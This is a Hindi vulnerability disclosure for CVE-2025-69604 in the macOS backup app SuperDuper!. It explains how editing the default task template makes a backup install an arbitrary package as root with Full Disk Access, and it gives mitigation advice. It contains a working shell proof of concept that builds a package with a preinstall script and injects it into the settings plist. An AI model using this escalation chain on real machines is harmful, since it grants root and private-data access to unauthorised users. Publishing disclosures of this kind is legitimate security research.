
CVE-2025-69604 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो macOS पर SuperDuper बैकअप कार्यों में दुर्भावनापूर्ण पैकेज इंस्टॉलेशन के माध्यम से विशेषाधिकार वृद्धि (privilege escalation) प्रदर्शित करता है।
यह भेद्यता CVE-2025-61229 में वर्णित भेद्यता के समान है – एक हमलावर कार्य टेम्पलेट को संपादित करके SuperDuper बैकअप कार्यों से एक मनमाना पैकेज इंस्टॉल करवा सकता है। पैकेज फिर रूट उपयोगकर्ता के रूप में और गोपनीयता पहुंच के उच्चतम स्तर (पूर्ण डिस्क पहुंच) के साथ शेल स्क्रिप्ट चला सकता है।
CVSS 3.1 स्कोर: NVD स्कोर लंबित है।
इस भेद्यता से बचने के लिए, या तो SuperDuper! एप्लिकेशन को हटा दें, या 3.12 अपडेट लागू करें।
यह एक्सप्लॉइट विश्लेषण और प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसे अपने जोखिम पर उपयोग करें।
SuperDuper CVE-2025-61229 भेद्यता के मेरे पिछले विश्लेषण में, मैंने पाया कि डेवलपर द्वारा SuperDuper 3.11 अपडेट में उस भेद्यता को संबोधित करने के बाद भी SuperDuper Default Settings टेम्पलेट स्वाभाविक रूप से असुरक्षित था। उस अपडेट ने केवल CVE-2025-61229 में विस्तृत विशिष्ट भेद्यता को संबोधित किया, लेकिन इस तथ्य को संबोधित नहीं किया कि एक हमलावर डिफ़ॉल्ट कार्य टेम्पलेट को संशोधित कर सकता है। दुर्भाग्यवश, कार्य टेम्पलेट में पैकेज इंस्टॉल करने की कार्यक्षमता शामिल है, इसलिए एक हमलावर कार्य टेम्पलेट को संशोधित करके ऐसा पैकेज निर्दिष्ट कर सकता है जो रूट उपयोगकर्ता के रूप में और पूर्ण डिस्क पहुंच के साथ सॉफ़्टवेयर इंस्टॉल कर सकता है या शेल स्क्रिप्ट चला सकता है।
डेवलपर ने "पैकेज इंस्टॉल करें" कार्यक्षमता को हटाकर इस भेद्यता को कम किया। फिर भी, एक हमलावर कार्य सेटिंग्स टेम्पलेट को अब भी संशोधित कर सकता है, और डेवलपर ने यह भी संकेत दिया कि उपयोगकर्ता को परेशान किए बिना इसे हल नहीं किया जा सकता (अर्थात हर बार कार्य संशोधित होने पर उपयोगकर्ता को प्रमाणित करने की आवश्यकता)। इसलिए ऐसा लगता है कि डिफ़ॉल्ट कार्य टेम्पलेट निकट भविष्य में संशोधन के लिए असुरक्षित बना रहेगा, क्योंकि डेवलपर इसे और अधिक सुरक्षित बनाने का कोई अन्य तरीका नहीं खोज सका।
मेरा पिछला निष्कर्ष दोहराने लायक है: रूट विशेषाधिकार और पूर्ण डिस्क पहुंच वे उच्चतम विशेषाधिकार हैं जो सॉफ़्टवेयर macOS पर प्राप्त कर सकता है। कोई भी डेवलपर जो उन विशेषाधिकारों को मांगता है, उसे आधुनिक सुरक्षा डिज़ाइन सिद्धांतों और सर्वोत्तम प्रथाओं का पालन करने वाला सॉफ़्टवेयर लिखना चाहिए। यह भेद्यता, साथ ही CVE-2025-57489 और CVE-2025-61228 में उजागर हुई भेद्यताएं, और यहां तक कि डेवलपर की अपनी स्वीकारोक्ति कि ये समस्याएं 22 वर्षों से बनी हुई हैं, यह दर्शाती हैं कि SuperDuper एक सुरक्षित उत्पाद होने के लिए डिज़ाइन नहीं किया गया था, और 22 वर्षों में आधुनिक सर्वोत्तम प्रथाओं का पालन करने के लिए इसमें नियमित डिज़ाइन सुधार नहीं हुए हैं।
इस भेद्यता पर CVE-2025-61229 के लगभग ठीक उसी तरीके से हमला किया जाता है, इसलिए मैं उस भेद्यता के अपने पिछले विश्लेषण का ही अनुसरण करूंगा। निम्नलिखित प्रूफ ऑफ कॉन्सेप्ट SuperDuper के संस्करण 3.11 के साथ एक्सप्लॉइट को प्रदर्शित करता है:
mkdir -p /tmp/scripts
cd ~; export home=`pwd`; export user=`whoami`
printf '#!/bin/bash\n' > /tmp/scripts/preinstall
printf "ls -l $home/Desktop > /Library/private_data.txt\n" >> /tmp/scripts/preinstall
chmod a+x /tmp/scripts/preinstall
pkgbuild --identifier com.gray.sdexploit --nopayload --scripts /tmp/scripts /tmp/attack.pkg
cd ~/'Library/Application Support/SuperDuper!/Saved Settings/.Default Settings.sdsp'
cp 'Session Settings.sdss' Settings.plist
defaults write "`pwd`"/Settings.plist SDshouldInstallPackage -bool YES
defaults write "`pwd`"/Settings.plist SDinstallerPackage /tmp/attack.pkg
cp Settings.plist 'Session Settings.sdss'
उन कमांड्स को पूरा करने के बाद, बस डिफ़ॉल्ट सेटिंग्स के साथ एक बैकअप चलाएँ और attack.pkg रूट विशेषाधिकारों और पूर्ण डिस्क पहुंच के साथ इंस्टॉल हो जाएगा। अंतिम परिणाम /Library में "private_data" नामक एक फ़ाइल है (अर्थात केवल रूट द्वारा लिखने योग्य) जिसमें आपके Desktop फ़ोल्डर की सूची होती है (अर्थात जिसे केवल पूर्ण डिस्क पहुंच के साथ चलने वाले कोड द्वारा ही एक्सेस किया जा सकता है)।